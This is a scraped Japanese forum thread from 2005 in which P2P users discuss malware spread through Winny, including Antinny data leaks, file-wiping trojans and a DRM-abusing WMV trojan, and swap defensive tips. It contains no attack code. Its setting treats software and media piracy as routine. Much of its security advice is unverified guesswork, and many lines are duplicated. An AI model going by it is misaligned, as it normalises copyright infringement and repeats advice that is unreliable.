丶_ ,i⌒i,,_(_/ ● i ̄ ̄ )_|__
__, '"  ̄ ヽ! ● _●) ミ~ ̄_● ヽ) クマー
(_/ ● i ∪ / ⊂{● |.
l ●( _●) (  ̄)- / -' i
/ヽ、 |∪l T i ● '")
クマ−
__ ヽ/ ヽ__
,"- `ヽ, / ● l )
/ ● \__ (● ● i"
__/ ●)  ̄ )"__ "`;
.(_i ● ' __, '"  ̄`'(___/.i⌒i
丶_ ,i⌒i,,_(_/ ● i ̄ ̄ )_|__
__, '"  ̄ ヽ! ● _●) ミ~ ̄_● ヽ) クマー
(_/ ● i ∪ / ⊂{● |.
l ●( _●) (  ̄)- / -' i
/ヽ、 |∪l T i ● '")
クマ−
460 :[名無し]さん(bin+cue).rar:05/01/11 14:23:25 ID:PlopXAXS
>>457
バレで困るような回線を使ってP2Pするほうがおかしい。
バレで困るような回線を使ってP2Pするほうがおかしい。
461 :[名無し]さん(bin+cue).rar:05/01/11 14:31:14 ID:Jl6+xW2X
WMVファイルを装うトロイの木馬、P2Pソフトで流行中〜DRMを悪用
http://internet.watch.impress.co.jp/cda/news/2005/01/11/6001.html
http://internet.watch.impress.co.jp/cda/news/2005/01/11/6001.html
462 :[名無し]さん(bin+cue).rar:05/01/11 14:57:25 ID:sZYsWR/u
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク
463 :[名無し]さん(bin+cue).rar:05/01/11 15:17:09 ID:XD08eir0
KazaaやeMule使ってる?
464 :ひみつの文字列さん:2024/12/18(水) 20:55:08 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
465 :[名無し]さん(bin+cue).rar:05/01/11 18:49:45 ID:uN3879nU
WMVなんて初めから怪しいし
DRMはふつうにOFFっておけば問題ないかと
DRMはふつうにOFFっておけば問題ないかと
466 :[名無し]さん(bin+cue).rar:05/01/12 01:18:26 ID:rfTHD0/Z
DRMってどうやってOFFできるの?
467 :[名無し]さん(bin+cue).rar:05/01/12 03:08:01 ID:fIq0umO2
>>466
暇だしネタもないのでマジレス(WMP9)
Windows Media Playerのメニュー[ツール]→[オプション]
タブ[プライバシー]で
□保護されたコンテンツのライセンスを自動的に取得する
↑このチェックを外す
ほかにも、インターネット接続とか、不足してる情報の取得とか
コーデックの自動ダウンロードなども、すべてのチェックを外しておいたほうが安全。
暇だしネタもないのでマジレス(WMP9)
Windows Media Playerのメニュー[ツール]→[オプション]
タブ[プライバシー]で
□保護されたコンテンツのライセンスを自動的に取得する
↑このチェックを外す
ほかにも、インターネット接続とか、不足してる情報の取得とか
コーデックの自動ダウンロードなども、すべてのチェックを外しておいたほうが安全。
468 :[名無し]さん(bin+cue).rar:05/01/12 04:03:08 ID:dbQtwguN
FWで通信を遮断させておくってのも手かな?
469 :[名無し]さん(bin+cue).rar:05/01/12 09:23:59 ID:V2ow4MZT
>>468
結果オーライだけど、FWログがうざくなるかな。
結果オーライだけど、FWログがうざくなるかな。
>>467
サンクス
サンクス
471 :[名無し]さん(bin+cue).rar:05/01/12 14:30:13 ID:n8pVYIKL
>>461,467
トンクスです(*'ー'*)
トンクスです(*'ー'*)
472 :[名無し]さん(bin+cue).rar:05/01/13 02:06:56 ID:rQ162Mhf
473 :[名無し]さん(bin+cue).rar:05/01/13 11:54:55 ID:Msukesr4
クマー
474 :[名無し]さん(bin+cue).rar:05/01/13 14:59:20 ID:l/W0ynMU
海外の割れインスコしたら
OSのファイルが書き換えられたorz
今OSをクリーンインスコ中
OSのファイルが書き換えられたorz
今OSをクリーンインスコ中
475 :[名無し]さん(bin+cue).rar:05/01/13 15:25:11 ID:tlgZS29t
こうしておまいのIPがアングラに流れ、踏み台への準備が整った。
476 :[名無し]さん(bin+cue).rar:05/01/13 16:54:07 ID:dc+/Hti8
キャッシュが勝手に消えていくウイルスに掛かったのですが、
駆除方法ありますか?
駆除方法ありますか?
477 :[名無し]さん(bin+cue).rar:05/01/13 17:08:23 ID:bCQJvaKB
478 :[名無し]さん(bin+cue).rar:05/01/13 17:09:27 ID:xLEALKO4
479 :[名無し]さん(bin+cue).rar:05/01/13 21:39:36 ID:BJWfAe0I
age
480 :[名無し]さん(bin+cue).rar:05/01/13 22:53:24 ID:+kBsK32i
481 :ひみつの文字列さん:2024/12/18(水) 20:55:08 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
482 :[名無し]さん(bin+cue).rar:05/01/13 23:07:12 ID:+2VyM1fz
プログラムに埋め込まれたウイルスって
ウイルスソフトで検知できるもの?
また、駆除できんの?
ウイルスソフトで検知できるもの?
また、駆除できんの?
483 :[名無し]さん(bin+cue).rar:05/01/13 23:13:58 ID:p11DyeEE
おひょひょひょひょ
484 :[名無し]さん(bin+cue).rar:05/01/14 00:34:01 ID:I7CPwS/8
くしゃみして左クリック
485 :[名無し]さん(bin+cue).rar:05/01/14 01:46:00 ID:FwIwGOfr
Windows Media DRMを悪用したトロイの木馬が登場
ttp://www.itmedia.co.jp/enterprise/articles/0501/12/news025.html
ttp://www.itmedia.co.jp/enterprise/articles/0501/12/news025.html
486 :[名無し]さん(bin+cue).rar:05/01/14 11:32:59 ID:sqvIWGSU
マイドキュメントを詰め合わせるキンタマの対策として、
マイドキュメントを使わないようにしています。
これって…
マイドキュメントのターゲット先を替えるだけじゃだめですか?
ターゲット先を替えるのではなく、何の関係の無いフォルダを使ってると
ファイル保存の時にたまに不便だったりするんですよね。
例えば「ペイント」で保存しようとすると「マイピクチャ」が必ず開くとかで。
XPHomeで共有PCにしてる人なんかは、マイドキュメントは重宝するでしょうし。
私は共有PCにはしてないので、こっちは問題ないんですが。
マイドキュメントを使わないようにしています。
これって…
マイドキュメントのターゲット先を替えるだけじゃだめですか?
ターゲット先を替えるのではなく、何の関係の無いフォルダを使ってると
ファイル保存の時にたまに不便だったりするんですよね。
例えば「ペイント」で保存しようとすると「マイピクチャ」が必ず開くとかで。
XPHomeで共有PCにしてる人なんかは、マイドキュメントは重宝するでしょうし。
私は共有PCにはしてないので、こっちは問題ないんですが。
487 :[名無し]さん(bin+cue).rar:05/01/14 11:38:53 ID:3XjgRaBh
インスコって何ですか?
488 :[名無し]さん(bin+cue).rar:05/01/14 11:54:18 ID:ifQrZF45
コピーってゼロックスですか?
489 :[名無し]さん(bin+cue).rar:05/01/14 11:55:59 ID:3XjgRaBh
クリンインスコも教えて
490 :[名無し]さん(bin+cue).rar:05/01/14 12:29:35 ID:ifQrZF45
くっ、案外と手強いな・・・ orz マケタ
491 :[名無し]さん(bin+cue).rar:05/01/14 12:58:18 ID:5lhJQB+o
worm.antinny.Rに感染したが、OSがWindowsMeだったので発病しなかった。
492 :[名無し]さん(bin+cue).rar:05/01/14 14:25:32 ID:pSkLu6/u
>>481
ひっかからないんで、キーワードも教えて。
ひっかからないんで、キーワードも教えて。
493 :[名無し]さん(bin+cue).rar:05/01/14 20:21:48 ID:kKNouhGn
オッス!おら○○(ユーザー名)!
それよりオラビックリしたぞ、亀仙人のジッちゃんからもらったWinnyってアイテム、
ネットに繋いでおくだけで、いろんなゲームやアプリがタダで手に入るんだ。
ドラゴンボール集めてるよりずっとおもしれぇーぞ!
公開前の映画まで流れてるんだから、ホントたまげたよなぁ〜
いつも落としてばかりじゃ悪いから、オラもファイルをアップするぞ!
まだまだWinny初心者だけど、これからもじゃんじゃんアップするから、
オラにみんなのファイルを分けてくれ!
↑これって感染してる人が撒いてるの?
それよりオラビックリしたぞ、亀仙人のジッちゃんからもらったWinnyってアイテム、
ネットに繋いでおくだけで、いろんなゲームやアプリがタダで手に入るんだ。
ドラゴンボール集めてるよりずっとおもしれぇーぞ!
公開前の映画まで流れてるんだから、ホントたまげたよなぁ〜
いつも落としてばかりじゃ悪いから、オラもファイルをアップするぞ!
まだまだWinny初心者だけど、これからもじゃんじゃんアップするから、
オラにみんなのファイルを分けてくれ!
↑これって感染してる人が撒いてるの?
494 :ひみつの文字列さん:2024/12/18(水) 20:55:08 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
495 :[名無し]さん(bin+cue).rar:05/01/15 11:27:01 ID:IjOqRDe9
>>486
俺もマイドキュメントは使っていない。
が、プロパティでリンク先を変えるのはどうなんだろう、と丁度思って今日スレ見てみた。
レスが無い(スルー?)ようなので、無い知恵絞って考えた。
C:\Documents and Settings\ユーザ名\My Documents
がデフォルトパス。
1.ウイルスがマイドキュメントフォルダを特定する時、ユーザ名部分を特定して攻撃。
2.マイドキュメントのターゲットフォルダの場所を特定して攻撃。
1の場合は回避できるが、2だとリンクを辿られている為に回避できない。
ウイルスの内部処理がどちらなのか結局わかりません。助けてください。
俺もマイドキュメントは使っていない。
が、プロパティでリンク先を変えるのはどうなんだろう、と丁度思って今日スレ見てみた。
レスが無い(スルー?)ようなので、無い知恵絞って考えた。
C:\Documents and Settings\ユーザ名\My Documents
がデフォルトパス。
1.ウイルスがマイドキュメントフォルダを特定する時、ユーザ名部分を特定して攻撃。
2.マイドキュメントのターゲットフォルダの場所を特定して攻撃。
1の場合は回避できるが、2だとリンクを辿られている為に回避できない。
ウイルスの内部処理がどちらなのか結局わかりません。助けてください。
496 :[名無し]さん(bin+cue).rar:05/01/15 11:38:25 ID:hSSD7p4o
自演乙
実験にもなってないけど、マイドキュメントにセーブデータを置くタイプの
ゲームを起動してみた。
これは>>495の2に該当しているようだ。
ということは(ウイルスにもよると思うが)ターゲット変更しただけでは
被害を食い止められないことが多いんではないだろうか?
ゲームを起動してみた。
これは>>495の2に該当しているようだ。
ということは(ウイルスにもよると思うが)ターゲット変更しただけでは
被害を食い止められないことが多いんではないだろうか?
498 :[名無し]さん(bin+cue).rar:05/01/15 12:33:55 ID:M0yIYQWD
【使用OS】 Me
【WindowsUpdateしてるか】 はい。
【AntiVirusは】ノートン 2004
【ちゃんとUpdateしてるか】 はい。
【症状か具体的に、分かる限りすべて書く】
突然ノートン2004のボタン類が「改変」だらけになって操作できなくなりました。
アンインストールして入れ直せと出たのでそうしましたが
「改変」だらけの理由はわかりませんでしょうか? ウィルスに何かされたんでしょうか?
入れなおしたノートンが反応しなければ、このままでいいのですか?
【Winnyのバージョン】 1.14
【何をしたらそんなことになったのか】
こころあたりとしては、nyで「キャシャ―ン」を落としてうっかり再生しました。
後でスキャンしたら「トロイのなんたら」が発見されて削除しました・・・
【これまでにとった措置】
アンインストールして入れ直してスキャンしました。
入れなおしたノートンが反応しなければ、このままでいいのですか?
今の状態から何か情報を盗まれるとかの心配はあるのでしょうか?
【WindowsUpdateしてるか】 はい。
【AntiVirusは】ノートン 2004
【ちゃんとUpdateしてるか】 はい。
【症状か具体的に、分かる限りすべて書く】
突然ノートン2004のボタン類が「改変」だらけになって操作できなくなりました。
アンインストールして入れ直せと出たのでそうしましたが
「改変」だらけの理由はわかりませんでしょうか? ウィルスに何かされたんでしょうか?
入れなおしたノートンが反応しなければ、このままでいいのですか?
【Winnyのバージョン】 1.14
【何をしたらそんなことになったのか】
こころあたりとしては、nyで「キャシャ―ン」を落としてうっかり再生しました。
後でスキャンしたら「トロイのなんたら」が発見されて削除しました・・・
【これまでにとった措置】
アンインストールして入れ直してスキャンしました。
入れなおしたノートンが反応しなければ、このままでいいのですか?
今の状態から何か情報を盗まれるとかの心配はあるのでしょうか?
499 :[名無し]さん(bin+cue).rar:05/01/15 13:03:02 ID:iAQHkZ43
> 突然ノートン2004のボタン類が「改変」だらけになって操作できなくなりました。
意味不明
君は自分の目でみたから、それで何が起こったか説明できたと思うのだろうけれど
何も知らない人がこの文章を見ても何がなんだかわからない
まぁそんなことはどうでもよくて。
そのキャシャーンのファイルが今もあるのなら解析も可能だが削除してしまった以上
再インストールするしかない、としか言えない。
サンプルが存在しない未知のウイルス類に対する完璧な対処法はこれしかない。
意味不明
君は自分の目でみたから、それで何が起こったか説明できたと思うのだろうけれど
何も知らない人がこの文章を見ても何がなんだかわからない
まぁそんなことはどうでもよくて。
そのキャシャーンのファイルが今もあるのなら解析も可能だが削除してしまった以上
再インストールするしかない、としか言えない。
サンプルが存在しない未知のウイルス類に対する完璧な対処法はこれしかない。
500 :[名無し]さん(bin+cue).rar:05/01/15 13:06:16 ID:iAQHkZ43
ノートンなんてのはPCを普通のことに使ってる人にとって有効なのであって、
この板にいるような人間には補助以上の役割は果たさないので
> 入れなおしたノートンが反応しなければ、このままでいいのですか?
などとはまかり間違っても考えないように。
あと多分AVIアイコンのexeなんだろうから、今後どんな挙動を示すかは作者しかわからない。
この板にいるような人間には補助以上の役割は果たさないので
> 入れなおしたノートンが反応しなければ、このままでいいのですか?
などとはまかり間違っても考えないように。
あと多分AVIアイコンのexeなんだろうから、今後どんな挙動を示すかは作者しかわからない。
501 :[名無し]さん(bin+cue).rar:05/01/15 13:16:18 ID:M0yIYQWD
> 突然ノートン2004のボタン類が「改変」だらけになって操作できなくなりました。
たぶん、なにかが書き換えられて使用者としての確認が取れなくなって
使用不可になったからだと思うのですが・・・
たぶん、なにかが書き換えられて使用者としての確認が取れなくなって
使用不可になったからだと思うのですが・・・
502 :[名無し]さん(bin+cue).rar:05/01/15 14:00:56 ID:pxq20wJ9
503 :[名無し]さん(bin+cue).rar:05/01/15 14:57:31 ID:kjlSXRLg
インスコって何ですか?
504 :[名無し]さん(bin+cue).rar:05/01/15 15:08:27 ID:/78j+ZLI
505 :[名無し]さん(bin+cue).rar:05/01/15 15:17:38 ID:FC0l6ISB
>>503
インポテンツ・スコピック
インポテンツ・スコピック
506 :[名無し]さん(bin+cue).rar:05/01/15 16:22:09 ID:6gNjO4WX
>503
Internet Scorpion
ネットに蠍のように潜む罠の事だ。
Internet Scorpion
ネットに蠍のように潜む罠の事だ。
うわ、こんなage質問にレスがついてる・・・
みなさん、お暇なんですね(´-`)
みなさん、お暇なんですね(´-`)
508 :[名無し]さん(bin+cue).rar:05/01/15 17:40:11 ID:gngJs7tl
おまえもな
>>495-496
あぁ、レスありがたい。
その実験とても参考になりました。
やっぱりターゲット先を読みに行ってるんでしょうね…。
その方がどう考えても効率良いですもんね(^_^;
なので私は全く別のところにマイドキュメント相当のフォルダを作って、
マイドキュメントにそのフォルダへのショートカットを置くことにしました。
クリック数が1回増えるんですが…
「名前を付けて保存」画面などの弄り方が分からないので…。
あと関係ないのですが、
以前デスクトップに20GBくらいのデータを置いてたんですよ(かっこわるい)
後でキンタマに感染していた事に気づいたのですが、
HDDの空き容量が5GBくらいしか無かったため、詰め合わせは作れなかったようです。
更に、詰め合わせだけではなくSSもキンタマが作ったフォルダには入っていませんでした。
多分なにも放流されていません。こんな予防法もあり…かも(^_^;
あぁ、レスありがたい。
その実験とても参考になりました。
やっぱりターゲット先を読みに行ってるんでしょうね…。
その方がどう考えても効率良いですもんね(^_^;
なので私は全く別のところにマイドキュメント相当のフォルダを作って、
マイドキュメントにそのフォルダへのショートカットを置くことにしました。
クリック数が1回増えるんですが…
「名前を付けて保存」画面などの弄り方が分からないので…。
あと関係ないのですが、
以前デスクトップに20GBくらいのデータを置いてたんですよ(かっこわるい)
後でキンタマに感染していた事に気づいたのですが、
HDDの空き容量が5GBくらいしか無かったため、詰め合わせは作れなかったようです。
更に、詰め合わせだけではなくSSもキンタマが作ったフォルダには入っていませんでした。
多分なにも放流されていません。こんな予防法もあり…かも(^_^;
>>495-497
の間違いでした…。
あと皆さんにもうひとつお聞きしたいのですが、
.txt等、特定の拡張子のファイルを位置関係なくあら探しして詰め合わせるような
ウイルスは存在してますか?
>>498
なんかを見て、もはやなんでもアリな気がしまして…。
の間違いでした…。
あと皆さんにもうひとつお聞きしたいのですが、
.txt等、特定の拡張子のファイルを位置関係なくあら探しして詰め合わせるような
ウイルスは存在してますか?
>>498
なんかを見て、もはやなんでもアリな気がしまして…。
511 :[名無し]さん(bin+cue).rar:05/01/15 19:25:07 ID:ik+4pY/2
>もはやなんでもあり
antinnyに関しては作者側もここ見て反応を参考にしてるだろうし、
これは困るという要望に応じて、どんどんカスタマイズされていくと
考えておかなきゃだめだぞ
antinnyに関しては作者側もここ見て反応を参考にしてるだろうし、
これは困るという要望に応じて、どんどんカスタマイズされていくと
考えておかなきゃだめだぞ
512 :[名無し]さん(bin+cue).rar:05/01/15 19:49:31 ID:6OeBtoeX
>>510
必死なとこ悪いが、置き場所に凝っても無駄だよ
必死なとこ悪いが、置き場所に凝っても無駄だよ
513 :[名無し]さん(bin+cue).rar:05/01/15 19:53:46 ID:P328QjsP
俺が恐いウイルスは、踏んだら金が儲かるウイルスだな・・・
そんなウイルスがあったら、とても恐くてガクブルだぜー (((( ;゚Д゚)))
そんなウイルスがあったら、とても恐くてガクブルだぜー (((( ;゚Д゚)))
514 :[名無し]さん(bin+cue).rar:05/01/15 19:53:53 ID:OVBj//OE
515 :[名無し]さん(bin+cue).rar:05/01/15 20:07:25 ID:EBWr5xTZ
もしご存知の方がいればお教えください
キンタマでメールを放流する奴って拡張子が「.dbx」のメールデータを放流するのか?
それとも「.eml」のe-mail メッセージを放流するのでしょうか?
「.eml」はバックアップすれば削除可能のようですが「.dbx」は削除できないようです
あと何か対策などご存知の方がいればお教えください
ちなみにメールソフトはOEです
OE使わなければ抜かれることもないのでしょうか?
キンタマでメールを放流する奴って拡張子が「.dbx」のメールデータを放流するのか?
それとも「.eml」のe-mail メッセージを放流するのでしょうか?
「.eml」はバックアップすれば削除可能のようですが「.dbx」は削除できないようです
あと何か対策などご存知の方がいればお教えください
ちなみにメールソフトはOEです
OE使わなければ抜かれることもないのでしょうか?
516 :[名無し]さん(bin+cue).rar:05/01/15 20:22:46 ID:pxq20wJ9
>>511
あっ…そうですよね。ごめんなさい(^_^;
>>512
それって…
位置関係なく指定拡張子のファイルを詰め合わせるような
ウイルスがすでにあるってことですか…?
>>514
ありがとうございます。
早速やってみました。助かりました・゚・(ノД`)・゚・。
あっ…そうですよね。ごめんなさい(^_^;
>>512
それって…
位置関係なく指定拡張子のファイルを詰め合わせるような
ウイルスがすでにあるってことですか…?
>>514
ありがとうございます。
早速やってみました。助かりました・゚・(ノД`)・゚・。
518 :[名無し]さん(bin+cue).rar:05/01/15 21:01:21 ID:pxq20wJ9
519 :[名無し]さん(bin+cue).rar:05/01/15 21:03:44 ID:6OeBtoeX
ウイルス怖い奴は別にP2P専用マシン組めって。
一度流出した情報や信用は二度と回収できないぞ。
一度流出した情報や信用は二度と回収できないぞ。
520 :[名無し]さん(bin+cue).rar:05/01/15 21:13:57 ID:GnYEK7CQ
>>518
晒し挙げのウイルスってAntinny.kですか?
MyDocumentsも詰め合わせるだけだと思ってました…(ノД`)
>>519
やっぱり、それが1番ですか…。
どれくらいコストかければ必要充分な専用機が組めるでしょうか?
前にそんなスレがあった気も…なんでしたっけ…。
晒し挙げのウイルスってAntinny.kですか?
MyDocumentsも詰め合わせるだけだと思ってました…(ノД`)
>>519
やっぱり、それが1番ですか…。
どれくらいコストかければ必要充分な専用機が組めるでしょうか?
前にそんなスレがあった気も…なんでしたっけ…。
521 :[名無し]さん(bin+cue).rar:05/01/15 21:24:43 ID:gngJs7tl
>>520
っでいつまで質問続ける?
っでいつまで質問続ける?
522 :[名無し]さん(bin+cue).rar:05/01/15 21:28:51 ID:GnYEK7CQ
あぁつい…ストップします…
523 :[名無し]さん(bin+cue).rar:05/01/15 21:32:06 ID:PgB03efd
空気を読める人でないと(掲示板を使うのは)難しい
524 :[名無し]さん(bin+cue).rar:05/01/15 21:33:18 ID:qWtVaD9q
>509
まぁもちつけ。
俺はwhiterの亜種にかかってガリガリッと音がしたので
タスクマネージャからウイルスをすぐストップ。
が、マイドキュメントフォルダ全消し&Dドライブ消されかかってた。
Dドライブの名前順に一つ一つ上書きして消していくらしいので、
D:\_01\ とかいうディレクトリに山ほどフォルダあるブツ(2chのログとか)を
10GBくらい置いておけば、ある程度全消しの予防は出来るみたいだね。
まぁもちつけ。
俺はwhiterの亜種にかかってガリガリッと音がしたので
タスクマネージャからウイルスをすぐストップ。
が、マイドキュメントフォルダ全消し&Dドライブ消されかかってた。
Dドライブの名前順に一つ一つ上書きして消していくらしいので、
D:\_01\ とかいうディレクトリに山ほどフォルダあるブツ(2chのログとか)を
10GBくらい置いておけば、ある程度全消しの予防は出来るみたいだね。
526 :[名無し]さん(bin+cue).rar:05/01/15 22:05:21 ID:6OeBtoeX
527 :[名無し]さん(bin+cue).rar:05/01/15 23:28:21 ID:GnYEK7CQ
けっこう的外れなこと言ってたのに…皆優しい・゚・(つД`)・゚・
>>524
…ごめんなさい。Antinny.Gがそうなんですね。
既出の内容を何度も質問して、申し訳ないです。
>>509
なるほどです。異音が出るなら間に合いそうですね。
早速置いておきました。
でもなんでwhiterはCから順番に消さないんでしょう…。
>>526
あっ、どうもですm(_ _)m
>>524
…ごめんなさい。Antinny.Gがそうなんですね。
既出の内容を何度も質問して、申し訳ないです。
>>509
なるほどです。異音が出るなら間に合いそうですね。
早速置いておきました。
でもなんでwhiterはCから順番に消さないんでしょう…。
>>526
あっ、どうもですm(_ _)m
529 :[名無し]さん(bin+cue).rar:05/01/15 23:55:52 ID:7by8iV/h
>>527
全レスしちゃうような善人・小心者はny止めろw
どうしてもやるなら自分でも書いてるが
マイドキュメント相当のフォルダ作成、デスクトップにファイル置かないなど、
ウイルス対策になると思ったことは書かれてなくても考えてしろ。
誘導されてるけどそこまでビビってるならny専用機組め。
6万あれば組める。
HDD2台追加すれば1つはDL専用、
もう1つをリムーバブルで、いっぱい落としても楽々管理できる。
全レスしちゃうような善人・小心者はny止めろw
どうしてもやるなら自分でも書いてるが
マイドキュメント相当のフォルダ作成、デスクトップにファイル置かないなど、
ウイルス対策になると思ったことは書かれてなくても考えてしろ。
誘導されてるけどそこまでビビってるならny専用機組め。
6万あれば組める。
HDD2台追加すれば1つはDL専用、
もう1つをリムーバブルで、いっぱい落としても楽々管理できる。
530 :[名無し]さん(bin+cue).rar:05/01/16 00:16:20 ID:ye1wWDS0
Cから順番に消さないのは
・大抵消えて欲しくないデータはCではなくD以降にある
・Cでファイルを消しすぎるとOS自体が機能しなくなるため「消す」こともできなくなる。
のどっちかが多いんじゃないかと思う。
まぁなんつっても作ってる奴の趣味だろうけどな。どこから消すかなんて。
・大抵消えて欲しくないデータはCではなくD以降にある
・Cでファイルを消しすぎるとOS自体が機能しなくなるため「消す」こともできなくなる。
のどっちかが多いんじゃないかと思う。
まぁなんつっても作ってる奴の趣味だろうけどな。どこから消すかなんて。
531 :[名無し]さん(bin+cue).rar:05/01/16 11:41:57 ID:ZE9d6QWL
>>529-530
アドバイス&お答えありがとうございます。
勉強になります。このスレの皆さん本当に優しい方ばかりです…。
甘えて質問ばかりでスレを埋め尽くさないように、気をつけたいと思います(^_^;
アドバイス&お答えありがとうございます。
勉強になります。このスレの皆さん本当に優しい方ばかりです…。
甘えて質問ばかりでスレを埋め尽くさないように、気をつけたいと思います(^_^;
532 :ひみつの文字列さん:2024/12/18(水) 20:55:08 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
533 :[名無し]さん(bin+cue).rar:05/01/16 19:22:21 ID:VPv1cWNx
>>532
ビューアはな〜に?
ビューアはな〜に?
534 :[名無し]さん(bin+cue).rar:05/01/16 19:30:57 ID:kJHYGjT9
>>533
ビューアっていうか、winrarで中身チェックです
ビューアっていうか、winrarで中身チェックです
535 :[名無し]さん(bin+cue).rar:05/01/16 20:01:33 ID:oY5GLKO1
536 :[名無し]さん(bin+cue).rar:05/01/16 20:01:39 ID:IPm4sJJ4
1台しかPC無くて不安ならUSBメモリを買ってきてnyの実行ファイルをそん中に入れとけ。
当然ライトプロテクト(書込み禁止)のスイッチをONにしてな。
そうすれば踏んでしまったときにプログラムが改ざんされる事はなくなる。
UPフォルダのテキストファイルも書き換えられることもないし。
で使わないときはUSBメモリを抜く。
まぁプロセスに割り込んで直に動作を送るタイプだったら意味無いんだが
当然ライトプロテクト(書込み禁止)のスイッチをONにしてな。
そうすれば踏んでしまったときにプログラムが改ざんされる事はなくなる。
UPフォルダのテキストファイルも書き換えられることもないし。
で使わないときはUSBメモリを抜く。
まぁプロセスに割り込んで直に動作を送るタイプだったら意味無いんだが
537 :[名無し]さん(bin+cue).rar:05/01/16 20:16:10 ID:2gWcIXoT
>>536
Winny以外のOSとかデータ消すようなトロイには全然意味無いと思うが...
Winny以外のOSとかデータ消すようなトロイには全然意味無いと思うが...
538 :[名無し]さん(bin+cue).rar:05/01/16 20:17:21 ID:kJHYGjT9
539 :[名無し]さん(bin+cue).rar:05/01/16 20:48:02 ID:VPv1cWNx
他の解凍ソフトではどうなるんだろ
540 :[名無し]さん(bin+cue).rar:05/01/16 20:58:01 ID:7+LOT0wR
>>532
自分で jpgファイルを RAR書庫にして、同じようにビューワーで見てみればいいのに。
そうすれば RARにそのビューワーの組み合わせだと、そのようなメッセージが出て正常かが分かると思うぞ。
自分で jpgファイルを RAR書庫にして、同じようにビューワーで見てみればいいのに。
そうすれば RARにそのビューワーの組み合わせだと、そのようなメッセージが出て正常かが分かると思うぞ。
541 :[名無し]さん(bin+cue).rar:05/01/16 21:07:26 ID:kJHYGjT9
>>539
スキルが無いので、winrar以外では、怖くて・・・
>>540
ビューアじゃなくてwinrarで中身を確認すると、メッセージが出ました。(>>534)
混乱させて、すみません。
元ファイルはzipです。
スキルが無いので、winrar以外では、怖くて・・・
>>540
ビューアじゃなくてwinrarで中身を確認すると、メッセージが出ました。(>>534)
混乱させて、すみません。
元ファイルはzipです。
542 :[名無し]さん(bin+cue).rar:05/01/16 21:32:09 ID:QM0MS9oZ
いや、だからな
拡張子がzipでも、ファイルが実はrarの場合に
winrarでjpeg梱包したのを見ると、そうなるのよ。
winrarのtempフォルダ見てみりゃ分かるんだが
拡張子jpegってのをjpgにしてるからな。仕様だつーの
拡張子がzipでも、ファイルが実はrarの場合に
winrarでjpeg梱包したのを見ると、そうなるのよ。
winrarのtempフォルダ見てみりゃ分かるんだが
拡張子jpegってのをjpgにしてるからな。仕様だつーの
543 :[名無し]さん(bin+cue).rar:05/01/16 21:45:07 ID:kJHYGjT9
>>542
試してみたけど、ならないですよ・・・ orz
試してみたけど、ならないですよ・・・ orz
544 :[名無し]さん(bin+cue).rar:05/01/16 22:34:19 ID:vFlweUiK
>>543
じゃあフィニッシュ!
じゃあフィニッシュ!
545 :[名無し]さん(bin+cue).rar:05/01/16 22:34:26 ID:KQO28QPV
>532
書庫が少し変なだけ
気になるなら解凍してから再度書庫に変換しな
問題なし
書庫が少し変なだけ
気になるなら解凍してから再度書庫に変換しな
問題なし
546 :[名無し]さん(bin+cue).rar:05/01/17 02:15:55 ID:MOqma8zn
>>532
俺もそれかはどうかわからないけど
同じ同人誌落とした でトレンドさんのスキャン
やったらウイが入ってたよ
でも解凍駆除したし、そのあとフォルダ、ドライブをスキャンしても無反応
jpgは本物だったから大丈夫。
俺もそれかはどうかわからないけど
同じ同人誌落とした でトレンドさんのスキャン
やったらウイが入ってたよ
でも解凍駆除したし、そのあとフォルダ、ドライブをスキャンしても無反応
jpgは本物だったから大丈夫。
547 :[名無し]さん(bin+cue).rar:05/01/17 06:54:39 ID:Lm+CcDbA
つーかさっさとGO BACK落とせお前ら。
548 :[名無し]さん(bin+cue).rar:05/01/17 11:52:49 ID:rqUMisKt
新種?
【使用OS】 Windows XP
【WindowsUpdateしてるか】してます
【AntiVirusは】 いれてない
【オンラインスキャンしたならその結果は】 みつからず
【Winnyのバージョン】 2.0 b7.1
【症状か具体的に、分かる限りすべて書く】
一応何の変化もありません。
キャッシュの中身もダウンもアップフォルダも
変わりありません。
ただ、プロセスにMSKernel32.comというプロセスが
増えたような気がします。
【何をしたらそんなことになったのか】
耳をすませば 大塚愛 aiko.zipというファイルを解凍
中にあった重要.txt exeを
テキストと間違えて起動orz
一応メモ帳の画面で
京都警察が〜〜みたいな文面が表示されました。
【これまでにとった措置】
オンラインスキャン
MSKernel32.comをプロセスから終了
MSKernel32スタートアップから削除
ファイルそのもののハッシュとかは分かりません。
でもまだファイルは手元にあります。
ファイル作成日も1月12日で新種かもしれない。
助けてえらい人
【使用OS】 Windows XP
【WindowsUpdateしてるか】してます
【AntiVirusは】 いれてない
【オンラインスキャンしたならその結果は】 みつからず
【Winnyのバージョン】 2.0 b7.1
【症状か具体的に、分かる限りすべて書く】
一応何の変化もありません。
キャッシュの中身もダウンもアップフォルダも
変わりありません。
ただ、プロセスにMSKernel32.comというプロセスが
増えたような気がします。
【何をしたらそんなことになったのか】
耳をすませば 大塚愛 aiko.zipというファイルを解凍
中にあった重要.txt exeを
テキストと間違えて起動orz
一応メモ帳の画面で
京都警察が〜〜みたいな文面が表示されました。
【これまでにとった措置】
オンラインスキャン
MSKernel32.comをプロセスから終了
MSKernel32スタートアップから削除
ファイルそのもののハッシュとかは分かりません。
でもまだファイルは手元にあります。
ファイル作成日も1月12日で新種かもしれない。
助けてえらい人
549 :[名無し]さん(bin+cue).rar:05/01/17 11:59:40 ID:pACzhcYF
【AntiVirusは】 いれてない
この時点で論外なんだが、いまどき二重拡張子に引っかかるとか、
ファイル作成日偽造も知らないやつがここに来ても意味が無い。
テンプレまとめを全部熟読&実行してから、またおいで。
この時点で論外なんだが、いまどき二重拡張子に引っかかるとか、
ファイル作成日偽造も知らないやつがここに来ても意味が無い。
テンプレまとめを全部熟読&実行してから、またおいで。
550 :[名無し]さん(bin+cue).rar:05/01/17 12:00:40 ID:nD9m9pU5
釣り?
551 :[名無し]さん(bin+cue).rar:05/01/17 12:41:25 ID:hjSuQT4Y
【使用OS】 XP
【WindowsUpdateしてるか】 はい。
【AntiVirusは】ノートン
【ちゃんとUpdateしてるか】 はい。
